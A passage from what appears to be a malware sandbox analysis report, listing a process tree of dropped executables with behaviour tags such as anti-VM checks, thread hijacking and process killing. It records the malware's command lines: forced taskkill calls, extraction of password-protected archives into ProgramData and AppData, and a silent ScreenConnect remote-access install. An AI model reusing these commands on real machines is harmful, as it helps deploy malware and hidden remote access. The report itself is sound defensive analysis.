        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6644
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "lss.exe"
        7⤵
        
        PID:6560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "lss.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "onn.exe"
        7⤵
        
        PID:3936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "onn.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "u-eng.exe"
        7⤵
        
        PID:5268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "u-eng.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6136
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c copy /y "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\41678903251236549780" "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe"
        7⤵
        
        PID:692
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\46197283504128096357." "C:\ProgramData""
        7⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\46197283504128096357." "C:\ProgramData"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6432
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\32098675419873205610." "C:\Users\Admin\Appdata\Local\\""
        7⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\32098675419873205610." "C:\Users\Admin\Appdata\Local\\"
        8⤵
        Executes dropped EXE
        
        PID:7056
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\75204139856203418759." "C:\Users\Admin\Appdata\Roaming\\""
        7⤵
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\mpc.exe x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\Temp\_MEI27~1\mpc\75204139856203418759." "C:\Users\Admin\Appdata\Roaming\\"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2896
    - - C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1312
    - - C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5848
      - C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2540
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 952
        6⤵
        Program crash
        
        PID:3176
    - - C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6496
    - - C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"
        6⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:6972
    - - C:\Users\Admin\AppData\Local\Temp\10028250101\imfsCjY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028250101\imfsCjY.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6940
      - C:\Users\Admin\AppData\Local\Temp\10028250101\imfsCjY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028250101\imfsCjY.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 972
        6⤵
        Program crash
        
        PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"
        5⤵
        Executes dropped EXE
        
        PID:4728
    - - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:224
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:216
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3872
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4972
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:6868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:720
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5224
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:7004
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3756
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:6892
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4344
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5548
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:6488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3012
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6812
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6956
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2440
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1096
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1008
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5508
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4988
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3668
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5848
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6940
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4152
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4704
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4144
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:456
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3144
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5756
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4772
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6596
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3820
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6532
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7128
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2152
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1112
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5216
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5744
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5232
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6284
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6660
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2572
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
